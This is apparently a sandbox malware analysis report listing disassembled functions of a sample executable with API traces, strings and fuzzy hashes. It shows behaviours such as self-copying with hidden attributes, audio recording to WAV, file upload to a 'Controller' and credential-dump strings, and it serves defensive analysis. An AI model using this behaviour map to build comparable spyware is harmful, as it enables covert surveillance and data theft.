                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                          • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                                          • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                                          • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                                          • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                                          • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                                          • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                                          • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                                          • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                                          • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$Write$Create
                                                                                          • String ID: RIFF$WAVE$data$fmt
                                                                                          • API String ID: 1602526932-4212202414
                                                                                          • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                          • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                                                          • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                          • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                                                          Function 004072AB Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe,00000001,00407688,C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc
                                                                                          • String ID: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                          • API String ID: 1646373207-4025155079
                                                                                          • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                          • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                                                          • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                          • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                                                          Function 0040CE34 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 0040CE42
                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                                                                          • _wcslen.LIBCMT ref: 0040CF21
                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe,00000000,00000000), ref: 0040CFBF
                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                                                          • _wcslen.LIBCMT ref: 0040D001
                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D068
                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                                                          • ExitProcess.KERNEL32 ref: 0040D09D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                          • String ID: 6$C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe$del$open
                                                                                          • API String ID: 1579085052-7121636
                                                                                          • Opcode ID: 283c2ff4283ef6ea14c9631ac3abc3b8d6689ce6a044c306617b0cf23f9fad85
                                                                                          • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                                                          • Opcode Fuzzy Hash: 283c2ff4283ef6ea14c9631ac3abc3b8d6689ce6a044c306617b0cf23f9fad85
                                                                                          • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                                                          Function 0041C0AC Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                                                          • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                                                          • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                                                          • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                                                          • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                                                          • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                                                          • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                                                          • _wcslen.LIBCMT ref: 0041C1CC
                                                                                          • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                                                          • GetLastError.KERNEL32 ref: 0041C204
                                                                                          • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                                                          • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                                                          • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                                                          • GetLastError.KERNEL32 ref: 0041C261
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                          • String ID: ?
                                                                                          • API String ID: 3941738427-1684325040
                                                                                          • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                          • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                                                          • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                          • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                                                          Function 0044F4AD Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$EnvironmentVariable$_wcschr
                                                                                          • String ID:
                                                                                          • API String ID: 3899193279-0
                                                                                          • Opcode ID: 28687395a6aa2078608bd89f57b343956b66557142a9620950dd617db5e8e69e
                                                                                          • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                                                          • Opcode Fuzzy Hash: 28687395a6aa2078608bd89f57b343956b66557142a9620950dd617db5e8e69e
                                                                                          • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                                                          Function 00414DC1 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                          • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                          • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                          • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                          • API String ID: 2490988753-744132762
                                                                                          • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                          • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                                                          • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                          • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                                                                          Function 0041D620 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                                                          • GetCursorPos.USER32(?), ref: 0041D67A
                                                                                          • SetForegroundWindow.USER32(?), ref: 0041D683
                                                                                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                                                          • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                                                          • ExitProcess.KERNEL32 ref: 0041D6F6
                                                                                          • CreatePopupMenu.USER32 ref: 0041D6FC
                                                                                          • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                          • String ID: Close
                                                                                          • API String ID: 1657328048-3535843008
                                                                                          • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                          • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                                                          • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                          • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                                                          Function 00445DD7 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$Info
                                                                                          • String ID:
                                                                                          • API String ID: 2509303402-0
                                                                                          • Opcode ID: 6f6fc0ac27b4b2f00b1102b51bee0220b0be09f2ed36c41455f2b0a14b53fe9c
                                                                                          • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                                                          • Opcode Fuzzy Hash: 6f6fc0ac27b4b2f00b1102b51bee0220b0be09f2ed36c41455f2b0a14b53fe9c
                                                                                          • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                                                          Function 00451346 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                                          • _free.LIBCMT ref: 0045137F
                                                                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                          • _free.LIBCMT ref: 004513A1
                                                                                          • _free.LIBCMT ref: 004513B6
                                                                                          • _free.LIBCMT ref: 004513C1
                                                                                          • _free.LIBCMT ref: 004513E3
                                                                                          • _free.LIBCMT ref: 004513F6
                                                                                          • _free.LIBCMT ref: 00451404
                                                                                          • _free.LIBCMT ref: 0045140F
                                                                                          • _free.LIBCMT ref: 00451447
                                                                                          • _free.LIBCMT ref: 0045144E
                                                                                          • _free.LIBCMT ref: 0045146B
                                                                                          • _free.LIBCMT ref: 00451483
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                          • String ID:
                                                                                          • API String ID: 161543041-0
                                                                                          • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                          • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                                                          • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                          • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                                                          Function 00408BB5 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 328fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                                                                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                                                          • __aulldiv.LIBCMT ref: 00408D88
                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                                                          • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                                                          • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                          • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                                                                          • API String ID: 3086580692-2596673759
                                                                                          • Opcode ID: ec79447335530b9eedf105eee5ae2cdf40cfe98c019c56848c9afd0be4808a34
                                                                                          • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                                                          • Opcode Fuzzy Hash: ec79447335530b9eedf105eee5ae2cdf40cfe98c019c56848c9afd0be4808a34
                                                                                          • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                                                          Function 00450680 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free
                                                                                          • String ID:
                                                                                          • API String ID: 269201875-0
                                                                                          • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                                          • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                                                          • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                                          • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                                                          Function 00412AEF Relevance: 18.0, APIs: 9, Strings: 1, Instructions: 482sleepfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                                          • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                                                          • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                                                          • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                                                          • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                                                          • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                                                          • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                          • String ID: /stext "
                                                                                          • API String ID: 1223786279-3856184850
                                                                                          • Opcode ID: 58ff01398609a6f5fcecfea01a89b3ec4c253fa653f0bf16984b79547a95a55e
                                                                                          • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                                                          • Opcode Fuzzy Hash: 58ff01398609a6f5fcecfea01a89b3ec4c253fa653f0bf16984b79547a95a55e
                                                                                          • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                                                                                          Function 00455C5B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                                                                          • GetLastError.KERNEL32 ref: 00455D6F
                                                                                          • __dosmaperr.LIBCMT ref: 00455D76
                                                                                          • GetFileType.KERNEL32(00000000), ref: 00455D82
                                                                                          • GetLastError.KERNEL32 ref: 00455D8C
                                                                                          • __dosmaperr.LIBCMT ref: 00455D95
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                                                          • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                                                          • GetLastError.KERNEL32 ref: 00455F31
                                                                                          • __dosmaperr.LIBCMT ref: 00455F38
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                          • String ID: H
                                                                                          • API String ID: 4237864984-2852464175
                                                                                          • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                          • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                                                          • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                                          • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                                                          Function 00450AA5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free
                                                                                          • String ID: \&G$\&G$`&G
                                                                                          • API String ID: 269201875-253610517
                                                                                          • Opcode ID: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
                                                                                          • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                                                          • Opcode Fuzzy Hash: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
                                                                                          • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                                                          Function 00414BEB Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
